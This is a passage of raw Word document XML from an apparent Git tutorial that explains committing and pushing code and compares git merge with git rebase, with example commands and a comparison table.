          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>push</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>commit</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> code in Git, you follow a series of commands to make changes, stage them, commit them, and then push them to a remote repository. Here's the step-by-step process with Git commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B01AC25"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Steps to Commit and Push Code in Git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A35EA33"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1. Check the Current Status of Your Repository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21666971"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To see the current status of your Git repository, use the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E7CF64"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lastRenderedPageBreak/>
        <w:t>git status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080C2A24"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This shows which files have been modified, which are staged for commit, and which are untracked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B94F77"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2. Stage the Changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412A5E66"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After modifying the files in your working directory, you need to stage them before committing. To stage specific files, use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1174448D"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add &lt;file_name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3476925D"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For example, to stage a file called index.js:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D9DC04"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add index.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DA6451"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 xml:space="preserve">If you want to stage </w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>all changes</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (modified and new files) at once, you can use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30472941"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add .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35067470"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3. Commit the Changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53ADADA6"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Once you’ve staged your changes, you can commit them to your local repository. The commit will capture the current state of your files, along with a message describing the changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EBA5A7"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commit -m "Your commit message"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133EC42C"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F890EB"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commit -m "Added new feature to improve user experience"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDC6567"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4. Push the Commit to a Remote Repository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452B1F0C"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To push your local commits to a remote repository (e.g., GitHub, GitLab), you need to use the git push command. Ensure you're pushing to the correct branch (usually main or master):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2252E84D"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push origin &lt;branch_name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A69CC0"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For example, to push changes to the main branch:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD8563A"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push origin main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3970DF2A"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5. Pull Changes (Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2E1DE8"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Before pushing your changes, it's a good practice to pull the latest changes from the remote repository to ensure you’re not overwriting anyone else's work. Use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163E2A58"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pull origin &lt;branch_name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EB3C5F"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0077F084"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pull origin main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1452AFED"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Example of a Full Workflow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4333E4E0"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Modify your files (e.g., add a new feature or fix a bug).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E0392F"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Check the status:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFE8D1B"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status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C77EDCC"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Stage the changes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEA6C4C"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add .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F497A80"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Commit the changes with a meaningful message:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60ED40A3"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commit -m "Fixed bug in user registration"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D599A4"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Pull the latest changes from the remote repository (if necessary):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0573D5B0"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pull origin main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D981C0"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Push the changes to the remote repository:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E538128"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push origin main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648ED6A3"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By following these steps, you'll successfully commit your changes to your local Git repository and push them to the remote repository.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DD2C23" w14:textId="5BF7DE72" w:rsidR="000C6CF9" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="000C6CF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3EC514D">
          <v:rect id="_x0000_i3338" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EFD029" w14:textId="124CFE7B" w:rsidR="00D70F52" w:rsidRPr="00CE4B95" w:rsidRDefault="001D1EE4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="828" w:name="_Toc196308308"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between rebase and merge</w:t>
      </w:r>
      <w:r w:rsidR="00D70F52" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="828"/>
    </w:p>
    <w:p w14:paraId="4DC05133" w14:textId="05A3774C" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00CA2729" w:rsidP="00324FFB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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git rebase</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>git merge</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are both used to integrate changes from one branch into another, but they do so in different ways. Here's a breakdown of the differences between the two:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F7ECF0"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1. git merge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7349A41A"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Purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Merges the changes from one branch into another, creating a new merge commit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B296F61"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How it works</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA2D8D8" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00CA2729" w:rsidP="00324FFB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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When you use git merge, Git will combine the changes from the source branch into the target branch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1565B302" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00CA2729" w:rsidP="00324FFB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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 xml:space="preserve">This creates a </w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>merge commit</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the target branch that has two parent commits: one from the target branch and one from the source branch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799113B6" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00CA2729" w:rsidP="00324FFB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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It does not modify the history of either branch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAE31F7"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Result</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBFAC85" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00CA2729" w:rsidP="00324FFB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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The history is preserved as is, with a merge commit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4A315A" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00CA2729" w:rsidP="00324FFB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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lastRenderedPageBreak/>
        <w:t>The commit history shows when the merge occurred and keeps all commits from both branches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5404AA" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00CA2729" w:rsidP="00324FFB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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Typically used when you want to preserve the history of both branches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4143C5B9"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60052D7C"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You are on the main branch and want to merge changes from the feature branch:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AEE1BD"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checkout main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D16D484"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merge feature</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE3C963"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Result</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A new commit is created that integrates the changes from feature into main. The commit history will show a "merge" event.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B19124" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00000000" w:rsidP="00324FF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1F7120">
          <v:rect id="_x0000_i3339" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3719D211"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2. git rebase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749CB4A9"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Purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Moves or applies commits from one branch onto another, rewriting the commit history.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACB9E92"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How it works</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308F2586" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00CA2729" w:rsidP="00324FFB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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With git rebase, Git takes the changes from the source branch and "re-applies" them on top of the target branch, as though the changes were made sequentially.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9F6163" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00CA2729" w:rsidP="00324FFB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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 xml:space="preserve">It </w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>rewrites</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the commit history by moving the base of the source branch to the target branch, resulting in a linear history.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43681FC1" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00CA2729" w:rsidP="00324FFB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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No merge commit is created. Instead, the changes are added as if they were part of the target branch all along.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9714A5"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Result</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFFB624" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00CA2729" w:rsidP="00324FFB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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The commit history will be linear, and there won't be any extra merge commit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFB3F65" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00CA2729" w:rsidP="00324FFB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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This is useful when you want to keep the history clean, as if the changes were made directly on top of the base branch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BBE7FF"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC00777"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You are on the feature branch and want to rebase it onto main:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EB344E"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checkout feature</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3542402C"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rebase main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A4956D"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Result</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The feature branch commits are moved on top of the main branch commits, making the history linear.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A054E57" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00000000" w:rsidP="00324FF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743D2FC">
          <v:rect id="_x0000_i3340" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="489B2DFB"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1"/>
        <w:gridCol w:w="3682"/>
        <w:gridCol w:w="5111"/>
      </w:tblGrid>
      <w:tr w:rsidR="00324FFB" w:rsidRPr="00324FFB" w14:paraId="7C4A5B4F" w14:textId="77777777" w:rsidTr="00CA2729">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="043FCFE0"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Aspect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F16881D"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git merge</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E707BCE"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git rebase</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00324FFB" w:rsidRPr="00324FFB" w14:paraId="358527F2" w14:textId="77777777" w:rsidTr="00CA2729">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B9DDEDC"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History</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="027B6CD3"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Creates a merge commit; history is preserved.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="540A9864"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Rewrites history; results in a linear history.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00324FFB" w:rsidRPr="00324FFB" w14:paraId="1A2DC1FD" w14:textId="77777777" w:rsidTr="00CA2729">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="505A43CF"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Merge Commit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31E82E52"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Yes, a merge commit is created.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3345DCA0"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No merge commit is created.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00324FFB" w:rsidRPr="00324FFB" w14:paraId="3D411F50" w14:textId="77777777" w:rsidTr="00CA2729">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6877D4E9"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Conflicts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="582FCBDB"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Conflicts need to be resolved once, then commit.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3CAC68E6"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Conflicts may need to be resolved for each commit.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00324FFB" w:rsidRPr="00324FFB" w14:paraId="36742362" w14:textId="77777777" w:rsidTr="00CA2729">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="065B1F26"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Workflow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70C6BB89"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Simpler; works well for integrating long-running branches.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13156298"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Cleaner history; better for smaller, more isolated feature branches.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00324FFB" w:rsidRPr="00324FFB" w14:paraId="7BD1B657" w14:textId="77777777" w:rsidTr="00CA2729">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="207E28FE"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Rewriting History</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22F74934"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Does not rewrite history.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03C01AD3"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Rewrites history; makes the history look like the commits were made sequentially.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00324FFB" w:rsidRPr="00324FFB" w14:paraId="6210BC86" w14:textId="77777777" w:rsidTr="00CA2729">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="374D0F75"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Usage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2256CC0E"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Use when you want to preserve the branch history.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76DEF2AD"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Use when you want to create a clean, linear history.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="371D4D40"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When to Use Each:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2971A7"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git merge</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FA18F8" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00CA2729" w:rsidP="00324FFB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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Use it when you want to preserve the full history, especially for long-running branches or when you want to keep the context of how and when features were merged.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9C9AF6" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00CA2729" w:rsidP="00324FFB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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It’s safer for public/shared branches since it doesn’t rewrite history.</w:t>
      </w:r>
    </w:p>
